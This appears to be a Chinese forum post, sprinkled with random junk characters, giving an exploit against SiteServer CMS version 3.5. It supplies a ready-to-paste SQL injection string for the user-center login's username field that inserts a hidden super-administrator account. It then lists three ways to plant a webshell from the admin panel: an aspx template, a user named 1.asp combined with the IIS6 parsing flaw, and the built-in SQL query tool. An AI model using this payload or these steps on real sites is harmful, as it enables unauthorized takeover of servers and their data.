经测试秒杀最新的3.5版
3 n1 [7 L0 ~8 E* jstieserver官网:www.siteserver.cn
8 w% y/ e) o. `EXP:5 |% K: U/ C4 m [5 i A
直接访问UserCenter/login.aspx
/ w# t3 [% P5 f; R: q用户名处输入:2 T, w6 i$ F6 c M7 g
, {- \, t* ~+ ?/ `6 r
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
$ }% i0 y1 P* C8 S* @( U密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。0 \/ P" n1 t* K* g' Q7 X$ u
之后再访问后台SiteServer/login.aspx用插入的用户登陆
h' N B6 Q i& G0 A4 L7 N后台拿webshell的三种方法:
" o# S: W% i- i& N/ |# U2 B! `一、& [. f' F, N0 m3 y/ Z
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
K2 P1 Y6 X4 |0 {! j. U二、4 E* A3 J. U- u) S( @
成员权限-》添加用户-》用户名为:1.asp
, @4 Q# ]4 Q/ g7 [- [% Khttp://127.0.0.1/usercenter/# j( s9 ~' M1 w: K, s5 g' s4 C
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell8 x* a, }8 S3 D U' z$ e1 s
(ps:后台添加用户时不会验证是否含有非法字符)% t( u7 E* n3 n4 h1 E& V4 _5 j, w
三、8 M" D/ Q" W0 J7 X. Z
系统工具-》实用工具-》机器参数查看6 S: E. {: J/ ^0 _) @( ^! m& l
可以看到数据库类型、名称,WEB路径
' s. U. O1 v4 q. U系统工具-》数据库工具-》SQL语句查询$ h& x5 C8 ^8 C: E% `' i [
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |